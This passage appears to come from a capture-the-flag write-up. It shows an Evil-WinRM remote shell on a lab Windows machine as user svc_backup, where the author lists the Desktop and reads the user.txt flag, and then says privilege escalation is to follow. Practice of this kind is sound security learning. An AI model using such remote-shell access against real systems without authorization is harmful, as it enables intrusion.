Cannot find path 'C:\Users\svc_backup\dektop' because it does not exist.
At line:1 char:1
+ cd dektop
+ ~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Users\svc_backup\dektop:String) [Set-Location], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.SetLocationCommand
*Evil-WinRM* PS C:\Users\svc_backup> cd Desktop
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> cat users.txt
Cannot find path 'C:\Users\svc_backup\Desktop\users.txt' because it does not exist.
At line:1 char:1
+ cat users.txt
+ ~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Users\svc_backup\Desktop\users.txt:String) [Get-Content], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> ls
Directory: C:\Users\svc_backup\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/28/2020 2:26 PM 32 user.txt
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> cat user.txt
3920bb317a0bef51027e2852be64b543
Privilege escalation – To be continued